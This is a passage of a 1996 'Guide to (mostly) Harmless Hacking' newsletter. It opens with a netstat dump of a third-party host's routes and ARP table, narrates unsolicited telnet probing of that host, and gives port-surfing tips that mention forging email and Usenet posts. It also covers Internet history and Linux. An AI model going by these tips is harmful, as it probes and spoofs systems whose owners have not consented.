206.206.103 GLORY.NM.ORG Up,Gateway 0 3629 se0 1500
198.59.168 GLORY.NM.ORG Up,Gateway 0 9063 se0 1500
206.206.104 GLORY.NM.ORG Up,Gateway 0 7333 se0 1500
206.206.168 GLORY.NM.ORG Up,Gateway 0 234 se0 1500
204.134.105 LAWRII.NM.ORG Up,Gateway 0 4826 se0 1500
206.206.105 LAWRII.NM.ORG Up,Gateway 0 422 se0 1500
204.134.41 LAWRII.NM.ORG Up,Gateway 0 41782 se0 1500
206.206.169 GLORY.NM.ORG Up,Gateway 0 5101 se0 1500
204.134.42 GLORY.NM.ORG Up,Gateway 0 10761 se0 1500
206.206.170 GLORY.NM.ORG Up,Gateway 0 916 se0 1500
198.49.44 GLORY.NM.ORG Up,Gateway 0 3 se0 1500
198.59.108 GLORY.NM.ORG Up,Gateway 0 2129 se0 1500
204.29.236 GLORY.NM.ORG Up,Gateway 0 125 se0 1500
206.206.172 GLORY.NM.ORG Up,Gateway 0 5839 se0 1500
204.134.108 GLORY.NM.ORG Up,Gateway 0 3216 se0 1500
206.206.173 GLORY.NM.ORG Up,Gateway 0 374 se0 1500
198.175.173 LAWRII.NM.ORG Up,Gateway 0 6227 se0 1500
198.59.110 GLORY.NM.ORG Up,Gateway 0 1797 se0 1500
198.51.238 GLORY.NM.ORG Up,Gateway 0 1356 se0 1500
192.136.110 GLORY.NM.ORG Up,Gateway 0 583 se0 1500
204.134.48 GLORY.NM.ORG Up,Gateway 0 42 se0 1500
198.175.176 LAWRII.NM.ORG Up,Gateway 0 32 se0 1500
206.206.114 LAWRII.NM.ORG Up,Gateway 0 44 se0 1500
206.206.179 LAWRII.NM.ORG Up,Gateway 0 14 se0 1500
198.59.179 PENNY.NM.ORG Up,Gateway 0 222 se0 1500
198.59.115 GLORY.NM.ORG Up,Gateway 1 132886 se0 1500
206.206.181 GLORY.NM.ORG Up,Gateway 0 1354 se0 1500
206.206.182 SIENNA.NM.ORG Up,Gateway 0 16 se0 1500
206.206.118 GLORY.NM.ORG Up,Gateway 0 3423 se0 1500
206.206.119 GLORY.NM.ORG Up,Gateway 0 282 se0 1500
206.206.183 SIENNA.NM.ORG Up,Gateway 0 2473 se0 1500
143.120.0 LAWRII.NM.ORG Up,Gateway 0 123533 se0 1500
206.206.184 GLORY.NM.ORG Up,Gateway 0 1114 se0 1500
205.167.120 GLORY.NM.ORG Up,Gateway 0 4202 se0 1500
206.206.121 GLORY.NM.ORG Up,Gateway 1 71 se0 1500
129.121.0 GRANDE.NM.ORG Up 12 21658599 se0 1500
204.134.122 GLORY.NM.ORG Up,Gateway 0 195 se0 1500
204.134.58 GLORY.NM.ORG Up,Gateway 0 7707 se0 1500
128.123.0 GLORY.NM.ORG Up,Gateway 0 34416 se0 1500
204.134.59 GLORY.NM.ORG Up,Gateway 0 1007 se0 1500
204.134.124 GLORY.NM.ORG Up,Gateway 0 37160 se0 1500
206.206.124 LAWRII.NM.ORG Up,Gateway 0 79 se0 1500
206.206.125 PENNY.NM.ORG Up,Gateway 0 233359 se0 1500
204.134.126 GLORY.NM.ORG Up,Gateway 0 497 se0 1500
206.206.126 LAWRII.NM.ORG Up,Gateway 0 13644 se0 1500
204.69.190 GLORY.NM.ORG Up,Gateway 0 4059 se0 1500
206.206.190 GLORY.NM.ORG Up,Gateway 0 1630 se0 1500
204.134.127 GLORY.NM.ORG Up,Gateway 0 45621 se0 1500
206.206.191 GLORY.NM.ORG Up,Gateway 0 3574 se0 1500
MultiNet IPX Routing tables:
Destination Gateway Flags Refcnt Use Interface MTU
---------- ---------- ----- ------ ----- --------- ----
MultiNet ARP table:
Host Network Address Ethernet Address Arp Flags
-------------------------------------------- ---------------- ---------
GLORY.NM.ORG (IP 129.121.1.4) AA:00:04:00:61:D0 Temporary
[UNKNOWN] (IP 129.121.251.1) 00:C0:05:01:2C:D2 Temporary
NARANJO.NM.ORG (IP 129.121.1.56) 08:00:87:04:9F:42 Temporary
CHAMA.NM.ORG (IP 129.121.1.8) AA:00:04:00:0C:D0 Temporary
[UNKNOWN] (IP 129.121.251.5) AA:00:04:00:D2:D0 Temporary
LAWRII.NM.ORG (IP 129.121.254.10) AA:00:04:00:5C:D0 Temporary
[UNKNOWN] (IP 129.121.1.91) 00:C0:05:01:2C:D2 Temporary
BRAVO.NM.ORG (IP 129.121.1.6) AA:00:04:00:0B:D0 Temporary
PENNY.NM.ORG (IP 129.121.1.10) AA:00:04:00:5F:D0 Temporary
ARRIBA.NM.ORG (IP 129.121.1.14) 08:00:2B:BC:C1:A7 Temporary
AZUL.NM.ORG (IP 129.121.1.51) 08:00:87:00:A1:D3 Temporary
ENSS365.NM.ORG (IP 129.121.1.3) 00:00:0C:51:EF:58 Temporary
AVATAR.NM.ORG (IP 129.121.254.1) 08:00:5A:1D:52:0D Temporary
[UNKNOWN] (IP 129.121.253.2) 08:00:5A:47:4A:1D Temporary
[UNKNOWN] (IP 129.121.254.5) 00:C0:7B:5F:5F:80 Temporary
CONCHAS.NM.ORG (IP 129.121.1.11) 08:00:5A:47:4A:1D Temporary
[UNKNOWN] (IP 129.121.253.10) AA:00:04:00:4B:D0 Temporary
MultiNet Network Interface statistics:
Name Mtu Network Address Ipkts Ierrs Opkts Oerrs Collis
---- --- ------- -------------- ----- ----- ----- ----- ------
se0 1500 129.121.0 GRANDE.NM.ORG 68422948 0 53492833 1 0
lo0 4136 127.0.0 127.0.0.1 1188191 0 1188191 0 0
MultiNet Protocol statistics:
65264173 IP packets received
22 IP packets smaller than minimum size
6928 IP fragments received
4 IP fragments timed out
34 IP received for unreachable destinations
704140 ICMP error packets generated
9667 ICMP opcodes out of range
4170 Bad ICMP packet checksums
734363 ICMP responses
734363 ICMP "Echo" packets received
734363 ICMP "Echo Reply" packets sent
18339 ICMP "Echo Reply" packets received
704140 ICMP "Destination Unreachable" packets sent
451243 ICMP "Destination Unreachable" packets received
1488 ICMP "Source Quench" packets received
163911 ICMP "ReDirect" packets received
189732 ICMP "Time Exceeded" packets received
126966 TCP connections initiated
233998 TCP connections established
132611 TCP connections accepted
67972 TCP connections dropped
28182 embryonic TCP connections dropped
269399 TCP connections closed
10711838 TCP segments timed for RTT
10505140 TCP segments updated RTT
3927264 TCP delayed ACKs sent
666 TCP connections dropped due to retransmit timeouts
111040 TCP retransmit timeouts
3136 TCP persist timeouts
9 TCP persist connection drops
16850 TCP keepalive timeouts
1195 TCP keepalive probes sent
14392 TCP connections dropped due to keepalive timeouts
28842663 TCP packets sent
12714484 TCP data packets sent
1206060086 TCP data bytes sent
58321 TCP data packets retransmitted
22144036 TCP data bytes retransmitted
6802199 TCP ACK-only packets sent
1502 TCP window probes sent
483 TCP URG-only packets sent
8906175 TCP Window-Update-only packets sent
359509 TCP control packets sent
38675084 TCP packets received
28399363 TCP packets received in sequence
1929418386 TCP bytes received in sequence
25207 TCP packets with checksum errors
273374 TCP packets were duplicates
230525708 TCP bytes were duplicates
3748 TCP packets had some duplicate bytes
493214 TCP bytes were partial duplicates
2317156 TCP packets were out of order
3151204672 TCP bytes were out of order
1915 TCP packets had data after window
865443 TCP bytes were after window
5804 TCP packets for already closed connection
941 TCP packets were window probes
10847459 TCP packets had ACKs
222657 TCP packets had duplicate ACKs
1 TCP packet ACKed unsent data
1200274739 TCP bytes ACKed
141545 TCP packets had window updates
13 TCP segments dropped due to PAWS
4658158 TCP segments were predicted pure-ACKs
24033756 TCP segments were predicted pure-data
8087980 TCP PCB cache misses
305 Bad UDP header checksums
17 Bad UDP data length fields
23772272 UDP PCB cache misses
MultiNet Buffer Statistics:
388 out of 608 buffers in use:
30 buffers allocated to Data.
10 buffers allocated to Packet Headers.
66 buffers allocated to Socket Structures.
57 buffers allocated to Protocol Control Blocks.
163 buffers allocated to Routing Table Entries.
2 buffers allocated to Socket Names and Addresses.
48 buffers allocated to Kernel Fork-Processes.
2 buffers allocated to Interface Addresses.
1 buffer allocated to Multicast Addresses.
1 buffer allocated to Timeout Callbacks.
6 buffers allocated to Memory Management.
2 buffers allocated to Network TTY Control Blocks.
11 out of 43 page clusters in use.
11 CXBs borrowed from VMS device drivers
2 CXBs waiting to return to the VMS device drivers
162 Kbytes allocated to MultiNet buffers (44% in use).
226 Kbytes of allocated buffer address space (0% of maximum).
Connection closed by foreign host.
[68] ->
Whoa! What was all that?
What we did was telnet to port 15 -- the netstat port-- which on some computers runs a daemon that tells anybody who cares to drop in just about everything about the connection made by all the computers linked to the Internet through this computer.
So from this we learned two things:
1) Grande.nm.org is a very busy and important computer.
2) Even a very busy and important computer can let the random port surfer come and play.
So my lady friend wanted to try out another port. I suggested the finger port, number 79. So she gave the command:
[68] ->telnet grande.nm.org 79
Trying 129.121.1.2 ...
Connected to grande.nm.org.
Escape character is '^]'.
finger
?Sorry, could not find "FINGER"
Connection closed by foreign host.
[69] ->telnet grande.nm.org 79
Trying 129.121.1.2 ...
Connected to grande.nm.org.
Escape character is '^]'.
help
?Sorry, could not find "HELP"
Connection closed by foreign host.
[69] ->telnet grande.nm.org 79
Trying 129.121.1.2 ...
Connected to grande.nm.org.
Escape character is '^]'.
?
?Sorry, could not find "?"
Connection closed by foreign host.
[69] ->telnet grande.nm.org 79
Trying 129.121.1.2 ...
Connected to grande.nm.org.
Escape character is '^]'.
man
?Sorry, could not find "MAN"
Connection closed by foreign host.
[69] ->
At first this looks like just a bunch of failed commands. But actually this is pretty fascinating. The reason is that port 79 is, under IETF rules, supposed to run fingerd, the finger daemon. So when she gave the command “finger” and grande.nm.org said ?Sorry, could not find "FINGER,” we knew this port was not following IETF rules.
Now on may computers they don’t run the finger daemon at all. This is because finger has so properties that can be used to gain total control of the computer that runs it.
But if finger is shut down, and nothing else is running on port 79, we woudl get the answer:
telnet: connect: Connection refused.
But instead we got connected and grande.nm.org was waiting for a command.
Now the normal thing a port surfer does when running an unfmiliar daemon is to coax it into revealing what commands it uses. “Help,” “?” and “man” often work. But it didn’t help us.
But even though these commands didn’t help us, they did tell us that the daemon is probably something sensitive. If it were a daemon that was meant for anybody and his brother to use, it would have given us instructions.
So what did we do next? We decided to be good Internet citizens and also stay out of jail We decided we’d beter log off.
But there was one hack we decided to do first: leave our mark on the shell log file.
The shell log file keeps a record of all operating system commands made on a computer. The adminsitrator of an obviously important computer such as grande.nm.org is probably competent enough to scan the records of what commands are given by whom to his computer. Especially on a port important enough to be running a mystery, non-IETF daemon. So everything we types while connected was saved on a log.
So my friend giggled with glee and left a few messages on port 79 before logging off. Oh, dear, I do believe she’s hooked on hacking. Hmmm, it could be a good way to meet cute sysadmins...
So, port surf’s up! If you want to surf, here’s the basics:
1) Get logged on to a shell account. That’s an account with your ISP that lets you give Unix commands. Or -- run Linux or some other kind of Unix on your PC and hook up to the Internet.
2) Give the command “telnet “ where is the internet address of the computer you wnat to visit and is whatever looks phun to you.
3) If you get the response “connected to,” then surf’s up!
Following are some of my favorite ports. It is legal and harmless to pay them visits so long as you don’t figure out how to gain superuser status while playing with them. However, please note that if you do too much port surfing from your shell account, your sysadmin may notice this in his or her shell log file. If he or she is prejudiced against hacking , you may get kicked off your ISP. So you may want to explain in advance that you are merely a harmless hacker looking to have a good time, er, um, learn about Unix. Yeh, that sounds good...
Port number Service Why it’s phun!
7 echo Whatever you type in, the host repeats back to you, used for ping
9 discard Dev/null -- how fast can you figure out this one?
11 systat Lots of info on users
13 daytime Time and date at computer’s location
15 netstat Tremendous info on networks but rarely used any more
19 chargen Pours out a stream of ASCII characters. Use ^C to stop.
21 ftp Transfers files
22 ssh secure shell login -- encrypted tunnel
23 telnet Where you log in if you don’t use ssh:)
25 smpt Forge email from Bill.Gates@Microsoft.org.
37 time Time
39 rlp Resource location
43 whois Info on hosts and networks
53 domain Nameserver
70 gopher Out-of-date info hunter
79 finger Lots of info on users
80 http Web server
110 pop Incoming email
119 nntp Usenet news groups -- forge posts, cancels
443 shttp Another web server
512 biff Mail notification
513 rlogin Remote login
who Remote who and uptime
514 shell Remote command, no password used!
syslog Remote system logging -- how we bust hackers
520 route Routing information protocol
**************************
Propeller head tip: Note that in most cases an Internet host will use these port number assignments for these services. More than one service may also be assigned simultaneously to the same port. This numbering system is voluntarily offered by the Internet Engineering Task Force (IETF). That means that an Internet host may use other ports for these services. Expect the unexpected!
If you have a copy of Linux, you can get the list of all the IETF assignments of port numbers in the file /etc/services.
********************************
_________________________________________________________
To subscribe to the Happy Hacker list, email hacker@techbroker.com with messge “subscribe hh.” Send me confidential email (please, no discussions of illegal activities) use cmeinel@techbroker.com. Please direct flames to dev/null@techbroker.com. Happy hacking!
Copyright 1996 Carolyn P. Meinel. You may forward the GUIDE TO (mostly) HARMLESS HACKING as long as you leave this notice at the end..
________________________________________________________
Contents of Volume 2:
Internet for Dummies
Linux!
Introduction to TCP/IP
Port Surfing!
____________________________________________________________
GUIDE TO (mostly) HARMLESS HACKING
Vol. 2 Number 1
Internet for Dummies -- skip this if you are a Unix wizard. But if you read on you’ll get some more kewl hacking instructions.
____________________________________________________________
The six Guides to (mostly) Harmless Hacking of Vol. 1 jumped immediately into how-to hacking tricks. But if you are like me, all those details of probing ports and playing with hypotheses and pinging down hosts gets a little dizzying.
So how about catching our breath, standing back and reviewing what the heck it is that we are playing with? Once we get the basics under control, we then can move on to serious hacking.
Also, I have been wrestling with my conscience over whether to start giving you step-by-step instructions on how to gain root access to other peoples’ computers. The little angel on my right shoulder whispers, “Gaining root without permission on other people’s computers is not nice. So don’t tell people how to do it.” The little devil on my left shoulder says, “Carolyn, all these hackers think you don’t know nothin’! PROOVE to them you know how to crack!” The little angel says, “If anyone reading Guide to (mostly) Harmless Hacking tries out this trick, you might get in trouble with the law for conspiracy to damage other peoples’ computers.” The little devil says, “But, Carolyn, tell people how to crack into root and they will think you are KEWL!”
So here’s the deal. In this and the next few issues of Guide to (mostly) Harmless Hacking I’ll tell you several ways to get logged on as the superuser in the root account of some Internet host computers. But the instructions will leave a thing or two to the imagination.
My theory is that if you are willing to wade through all this, you probably aren’t one of those cheap thrills hacker wannabes who would use this knowledge to do something destructive that would land you in jail.
*****************************
Technical tip: If you wish to become a *serious* hacker, you’ll need Linux (a freeware variety of Unix) on your PC. One reason is that then you can crack into root legally all you want -- on your own computer. It sure beats struggling around on someone else’s computer only to discover that what you thought was root was a cleverly set trap and the sysadmin and FBI laugh at you all the way to jail.
Linux can be installed on a PC with as little as a 386 CPU, only 2 Mb RAM and as little as 20 MB of hard disk. You will need to reformat your hard disk. While some people have successfully installed Linux without trashing their DOS/Windows stuff, don’t count on getting away with it. Backup, backup, backup!
*****************************
*****************************
You can go to jail warning: Crack into root on someone else’s computer and the slammer becomes a definite possibility. Think about this: when you see a news story about some hacker getting busted, how often do you recognize the name? How often is the latest bust being done to someone famous, like Dark Tangent or se7en or Emmanuel Goldstein? How about, like, never! That’s because really good hackers figure out how to not do stupid stuff. They learn how to crack into computers for the intellectual challenge and to figure out how to make computers safe from intruders. They don’t bull their way into root and make a mess of things, which tends to inspire sysadmins to call the cops.
*********************************
Exciting notice: Is it too boring to just hack into your own Linux machine? Hang in there. Ira Winkler of the National Computer Security Association, Dean Garlick of the Space Dynamics Lab of Utah State University and I are working on setting up hack.net, a place where it will be legal to break into computers. Not only that, we’re looking for sponsors who will give cash awards and scholarships to those who show the greatest hacking skills. Now does that sound like more phun than jail?
*****************************
So, let’s jump into our hacking basics tutorial with a look at the wondrous anarchy that is the Internet.
Note that these Guides to (mostly) Harmless Hacking focus on the Internet. That is because there are many legal ways to hack on the Internet. Also, there are over 10 million of these readily hackable computers on the Internet, and the number grows every day.
Internet Basics
No one owns the Internet. No one runs it. It was never planned to be what it is today. It just happened, the mutant outgrowth of a 1969 US Defense Advanced Research Projects Agency experiment.
This anarchic system remains tied together because its users voluntarily obey some basic rules. These rules can be summed up in two words: Unix and TCP/IP (with a nod to UUCP). If you understand, truly understand Unix and TCP/IP (and UUCP), you will become a fish swimming in the sea of cyberspace, an Uberhacker among hacker wannabes, a master of the Internet universe.
To get technical, the Internet is a world-wide distributed computer/communications network held together by a common communications standard, Transmission Control Protocol/Internet Protocol (TCP/IP) and a bit of UUCP. These standards allow anyone to hook up a computer to the Internet, which then becomes another node in this network of the Internet. All that is needed is to get an Internet address assigned to the new computer, which is then known as an Internet "host," and tie into an Internet communications link. These links are now available in almost all parts of the world.
If you use an on-line service from your personal computer, you, too, can temporarily become part of the Internet. There are two main ways to hook up to an on-line service.
There is the cybercouch potato connection that every newbie uses. It requires either a point-to-point (PPP) or SLIPconnection, which allows you to run pretty pictures with your Web browser. If you got some sort of packaged software from your ISP, it automatically gives you this sort of connection.
Or you can connect with a terminal emulator to an Internet host. This program may be something as simple as the Windows 3.1 “Terminal” program under the “Accessories” icon. Once you have dialed in and connected you are just another terminal on this host machine. It won’t give you pretty pictures. This connection will be similar to what you get on an old-fashioned BBS. But if you know how to use this kind of connection, it could even give you root access to that host.
But how is the host computer you use attached to the Internet? It will be running some variety of the Unix operating system. Since Unix is so easy to adapt to almost any computer, this means that almost any computer may become an Internet host.
For example, I sometimes enter the Internet through a host which is a Silicon Graphics Indigo computer at Utah State University. Its Internet address is fantasia.idec.sdl.usu.edu. This is a computer optimized for computer animation work, but it can also operate as an Internet host. On other occasions the entry point used may be pegasus.unm.edu, which is an IBM RS 6000 Model 370. This is a computer optimized for research at the University of New Mexico.
Any computer which can run the necessary software -- which is basically the Unix operating system -- has a modem, and is tied to an Internet communications link, may become an Internet node. Even a PC may become an Internet host by running one of the Linux flavors of Unix. After setting it up with Linux you can arrange with the ISP of your choice to link it permanently to the Internet.
In fact, many ISPs use nothing more than networked PCs running Linux!
As a result, all the computing, data storage, and sending, receiving and forwarding of messages on the Internet is handled by the millions of computers of many types and owned by countless companies, educational institutions, governmental entities and even individuals.
Each of these computers has an individual address which enables it to be reached through the Internet if hooked up to a appropriate communications link. This address may be represented in two ways: as a name or a number.
The communications links of the Internet are also owned and maintained in the same anarchic fashion as the hosts. Each owner of an Internet host is responsible for finding and paying for a communications link that will get that host tied in with at least one other host. Communications links may be as simple as a phone line, a wireless data link such as cellular digital packet data, or as complicated as a high speed fiber optic link. As long as the communications link can use TCP/IP or UUCP, it can fit into the Internet.
Thus the net grows with no overall coordination. A new owner of an Internet host need only get permission to tie into one communications link to one other host. Alternatively, if the provider of the communications link decides this host is, for example, a haven for spammers, it can cut this “rogue site” off of the Internet. The rogue site then must snooker some other communications link into tying it into the Internet again.
The way most of these interconnected computers and communications links work is through the common language of the TCP/IP protocol. Basically, TCP/IP breaks any Internet communication into discrete "packets." Each packet includes information on how to rout it, error correction, and the addresses of the sender and recipient. The idea is that if a packet is lost, the sender will know it and resend the packet. Each packet is then launched into the Internet. This network may automatically choose a route from node to node for each packet using whatever is available at the time, and reassembles the packets into the complete message at the computer to which it was addressed.
These packets may follow tortuous routes. For example, one packet may go from a node in Boston to Amsterdam and back to the US for final destination in Houston, while another packet from the same message might be routed through Tokyo and Athens, and so on. Usually, however, the communications links are not nearly so torturous. Communications links may include fiber optics, phone lines and satellites.
The strength of this packet-switched network is that most messages will automatically get through despite heavy message traffic congestion and many communications links being out of service. The disadvantage is that messages may simply disappear within the system. It also may be difficult to reach desired computers if too many communications links are unavailable at the time.
However, all these wonderful features are also profoundly hackable. The Internet is robust enough to survive -- so its inventors claim -- even nuclear war. Yet it is also so weak that with only a little bit of instruction, it is possible to learn how to seriously spoof the system (forged email) or even temporarily put out of commission other people's Internet host computers (flood pinging, for example.)
On the other hand, the headers on the packets that carry hacking commands will give away the account information from which a hacker is operating. For this reason it is hard to hide perfectly when on the Internet.
It is this tension between this power and robustness and weakness and potential for confusion that makes the Internet a hacker playground.
For example, HERE IS YOUR HACKER TIP YOU’VE BEEN WAITING FOR THIS ISSUE:
ftp://ftp.secnet.com
This ftp site was posted on the BUGTRAQ list, which is dedicated to discussion of Unix security holes. Moderator is Aleph One, who is a genuine Uberhacker. If you want to subscribe to the BUGTRAQ, email LISTSERV@netspace.org with message “subscribe BUGTRAQ.”
Now, back to Internet basics.
History of Internet
As mentioned above, the Internet was born as a US Advanced Research Projects Agency (ARPA) effort in 1969. Its inventors called it ARPANET. But because of its value in scientific research, the US National Science Foundation (NSF) took it over in 1983. But over the years since then it gradually evolved away from any single source of control. In April 1995 NSF cut the last apron strings. Now the Internet is run by no one. It just happens and grows out of the efforts of those who play with it and struggle with the software and hardware.
Nothing at all like this has ever happened before. We now have a computer system with a life of its own. We, as hackers, form a big part of the mutation engine that keeps the Internet evolving and growing stronger. We also form a big part of the immune system of this exotic creature.
The original idea of ARPANET was to design a computer and communications network that would eventually become so redundant, so robust, and so able to operate without centralized control, that it could even survive nuclear war. What also happened was that ARPANET evolved into a being that has survived the end of government funding without even a blip in its growth. Thus its anarchic offspring, the Internet, has succeeded beyond the wildest dreams of its original architects.
The Internet has grown explosively, with no end in sight. At its inception as ARPANET it held only 4 hosts. A quarter of a century later, in 1984, it contained only 1000 hosts. But over the next 5 years this number grew tenfold to 10,000 (1989). Over the following 4 years it grew another tenfold to 1 million (1993). Two years later, at the end of 1995, the Internet was estimated to have at least 6 million host computers. There are probably over 10 million now. There appears to be no end in sight yet to the incredible growth of this mutant child of ARPANET.
In fact, one concern raised by the exponential growth in the Internet is that demand may eventually far outrace capacity. Because now no entity owns or controls the Internet, if the capacity of the communications links among nodes is too small, and it were to become seriously bogged down, it might be difficult to fix the problem.
For example, in 1988, Robert Morris, Jr. unleashed a "virus"-type program on the Internet commonly known as the “Morris Worm.” This virus would make copies of itself on whatever computer it was on and then send copies over communications links to other Internet hosts. (It used a bug in sendmail that allowed access to root, allowing the virus to act as the superuser).
Quickly the exponential spread of this virus made the Internet collapse from the communications traffic and disk space it tied up.
At the time the Internet was still under some semblance of control by the National Science Foundation and was connected to only a few thousand computers. The Net was shut down and all viruses purged from its host computers, and then the Net was put back into operation. Morris, meanwhile, was put in jail.
There is some concern that, despite improved security measures (for example, "firewalls"), someone may find a new way to launch a virus that could again shut down the Internet. Given the loss of centralized control, restarting it could be much more time-consuming if this were to happen again.
But reestablishing a centralized control today like what existed at the time of the “Morris Worm” is likely to be impossible. Even if it were possible, the original ARPANET architects were probably correct in their assessment that the Net would become more susceptible for massive failure rather than less if some centralized control were in place.
Perhaps the single most significant feature of today's Internet is this lack of centralized control. No person or organization is now able to control the Internet. In fact, the difficulty of control became an issue as early as its first year of operation as ARPANET. In that year email was spontaneously invented by its users. To the surprise of ARPANET's managers, by the second year email accounted for the bulk of the communication over the system.
Because the Internet had grown to have a fully autonomous, decentralized life of its own, in April 1995, the NSF quit funding NSFNET, the fiber optics communications backbone which at one time had given NSF the technology to control the system. The proliferation of parallel communications links and hosts had by then completely bypassed any possibility of centralized control.
There are several major features of the Internet:
* World Wide Web -- a hypertext publishing network and now the fastest growing part of the Internet.
* email -- a way to send electronic messages
* Usenet -- forums in which people can post and view public messages
* telnet -- a way to login to remote Internet computers
* file transfer protocol -- a way to download files from remote Internet computers
* Internet relay chat -- real-time text conversations -- used primarily by hackers and other Internet old-timers
* gopher -- a way of cataloging and searching for information. This is rapidly growing obsolete.
As you port surfers know, there are dozens of other interesting but less well known services such as whois, finger, ping etc.
The World Wide Web
The World Wide Web is the newest major feature of the Internet, dating from the spring of 1992. It consists of "Web pages," which are like pages in a book, and links from specially marked words, phrases or symbols on each page to other Web pages. These pages and links together create what is known as "hypertext." This technique makes it possible to tie together many different documents which may be written by many people and stored on many different computers around the world into one hypertext document.
This technique is based upon the Universal Resource Locator (URL) standard, which specifies how to hook up with the computer and access the files within it where the data of a Web page may be stored.
A URL is always of the form http://
Here's how the hypertext of the World Wide Web works. The reader would come to a statement such as "our company offers LTL truck service to all major US cities." If this statement on the "Web page" is highlighted, that means that a click of the reader's computer mouse will take him or her to a new Web page with details. These may include complete schedules and a form to fill out to order a pickup and delivery.
Some Web pages even offer ways to make electronic payments, usually through credit cards.
However, the security of money transfers over the Internet is still a major issue. Yet despite concerns with verifiability of financial transactions, electronic commerce over the Web is growing fast. In its second full year of existence, 1994, only some $17.6 million in sales were conducted over the Web. But in 1995, sales reached $400 million. Today, in 1996, the Web is jammed with commercial sites begging for your credit card information.
In addition, the Web is being used as a tool in the distribution of a new form of currency, known as electronic cash. It is conceivable that, if the hurdle of verifiability may be overcome, that electronic cash (often called ecash) may play a major role in the world economy, simplifying international trade. It may also eventually make national currencies and even taxation as we know it obsolete.
Examples of Web sites where one may obtain ecash include the Mark Twain Bank of St. Louis, MO (http://www.marktwain.com) and Digicash of Amsterdam, The Netherlands (http://www.digicash.com).
The almost out-of-control nature of the Internet manifests itself on the World Wide Web. The author of a Web page does not need to get permission or make any arrangement with the authors of other Web pages to which he or she wishes to establish links. Links may be established automatically simply by programming in the URLs of desired Web page links.
Conversely, the only way the author of a Web page can prevent other people from reading it or establishing hypertext links to it is to set up a password protection system (or by not having communications links to the rest of the Internet).
A problem with the World Wide Web is how to find things on it. Just as anyone may hook a new computer up to the Internet, so also there is no central authority with control or even knowledge of what is published where on the World Wide Web. No one needs to ask permission of a central authority to put up a Web page.
Once a user knows the address (URL) of a Web page, or at least the URL of a Web page that links eventually to the desired page, then it is possible (so long as communications links are available) to almost instantly hook up with this page.
Because of the value of knowing URLs, there now are many companies and academic institutions that offer searchable indexes (located on the Web) to the World Wide Web. Automated programs such as Web crawlers search the Web and catalog the URLs they encounter as they travel from hypertext link to hypertext link. But because the Web is constantly growing and changing, there is no way to create a comprehensive catalog of the entire Web.
Email is the second oldest use of the Internet, dating back to the ARPAnet of 1972. (The first use was to allow people to remotely log in to their choice of one of the four computers on which ARPAnet was launched in 1971.)
There are two major uses of email: private communications, and broadcasted email. When broadcasted, email serves to make announcements (one-way broadcasting), and to carry on discussions among groups of people such as our Happy Hacker list. In the group discussion mode, every message sent by every member of the list is broadcasted to all other members.
The two most popular program types used to broadcast to email discussion groups are majordomo and listserv.
Usenet
Usenet was a natural outgrowth of the broadcasted email group discussion list. One problem with email lists is that there was no easy way for people new to these groups to join them. Another problem is that as the group grows, a member may be deluged with dozens or hundreds of email messages each day.
In 1979 these problems were addressed by the launch of Usenet. Usenet consists of news groups which carry on discussions in the form of "posts." Unlike an email discussion group, these posts are stored, typically for two weeks or so, awaiting potential readers. As new posts are submitted to a news group, they are broadcast to all Internet hosts that are subscribed to carry the news groups to which these posts belong.
With many Internet connection programs you can see the similarities between Usenet and email. Both have similar headers, which track their movement across the Net. Some programs such as Pine are sent up to send the same message simultaneously to both email addresses and newsgroups. All Usenet news readers allow you to email the authors of posts, and many also allow you to email these posts themselves to yourself or other people.
Now, here is a quick overview of the Internet basics we plan to cover in the next several issues of Guide to (mostly) Harmless Hacking:
1. Unix
We discuss “shells” which allow one to write programs (“scripts”) that automate complicated series of Unix commands. The reader is introduced to the concept of scripts which perform hacking functions. We introduce Perl, which is a shell programming language used for the most elite of hacking scripts such as SATAN.
3. TCP/IP and UUCP
This chapter covers the communications links that bind together the Internet from a hackers' perspective. Extra attention is given to UUCP since it is so hackable.
4. Internet Addresses, Domain Names and Routers
The reader learns how information is sent to the right places on the Internet, and how hackers can make it go to the wrong places! How to look up UUCP hosts (which are not under the domain name system) is included.
5. Fundamentals of Elite Hacking: Ports, Packets and File Permissions
This section lets the genie of serious hacking out of the bottle. It offers a series of exercises in which the reader can enjoy gaining access to almost any randomly chosen Internet host. In fact, by the end of the chapter the reader will have had the chance to practice several dozen techniques for gaining entry to other peoples' computers. Yet these hacks we teach are 100% legal!
_________________________________________________________
Want to subscribe to this list? Email hacker@techbroker.com with the message “subscribe happyhacker.” Want to share some kewl stuph with the Happy Hacker list? Send your messages to hacker@techbroker.com. To send me confidential email (please, no discussions of illegal activities) use cmeinel@techbroker.com. Please direct flames to dev/null@techbroker.com. Happy hacking!
Copyright 1996 Carolyn P. Meinel. You may forward the GUIDE TO (mostly) HARMLESS HACKING as long as you leave this notice at the end..
________________________________________________________
________________________________________
GUIDE TO (mostly) HARMLESS HACKING
Vol. 2 Number 2
Linux!
________________________________________
Unix has become the primo operating system of the Internet. In fact, Unix is the most widely used operating system in the world among computers with more power than PCs.
True, Windows NT is coming up fast as a common Internet operating system, and is sooo wonderfully buggy that it looks like it could become the number one favorite to crack into. But today Unix in all its wonderful flavors still is the operating system to know in order to be a truly elite hacker.
So far we have assumed that you have been hacking using a shell account that you get through your Internet Service Provider (ISP). A shell account allows you to give Unix commands on one of your ISP's computers. But you don't need to depend on your ISP for a machine that lets you play with Unix. You can run Unix on your own computer and with a SLIP or PPP connection be directly connected to the Internet.
***********************
Newbie note: Serial Line Internet Protocol (SLIP) and Point-to-Point Protocol (PPP) connections give you a temporary Internet Protocol (IP) address that allows you to be hooked directly to the Internet. You have to use either SLIP or PPP connections to get to use a Web browser that gives you pictures instead on text only. So if you can see pictures on the Web, you already have one of these available to you.
The advantage of using one of these direct connections for your hacking activities is that you will not leave behind a shell log file for your ISP's sysadmin to pore over. Even if you are not breaking the law, a shell log file that shows you doing lots of hacker stuph can be enough for some sysadmins to summarily close your account.
********************
What is the best kind of computer to run Unix on? Unless you are a wealthy hacker who thinks nothing of buying a Sun SPARC workstation, you'll probably do best with some sort of PC. There are almost countless variants of Unix that run on PCs, and a few for Macs. Most of them are free for download, or inexpensively available on CD-ROMs.
The three most common variations of Unix that run on PCs are Sun's Solaris, FreeBSD and Linux. Solaris costs around $700. Enough said. FreeBSD is really, really good. But you con't find many manuals or newsgroups that cover FreeBSD.
Linux, however, has the advantage of being available in many variants (so you can have fun mixing and matching programs from different Linux offerings). Most importantly, Linux is supported by many manuals, news groups, mail lists and Web sites. If you have hacker friends in your area, most of them probably use Linux and can help you out.
*********************
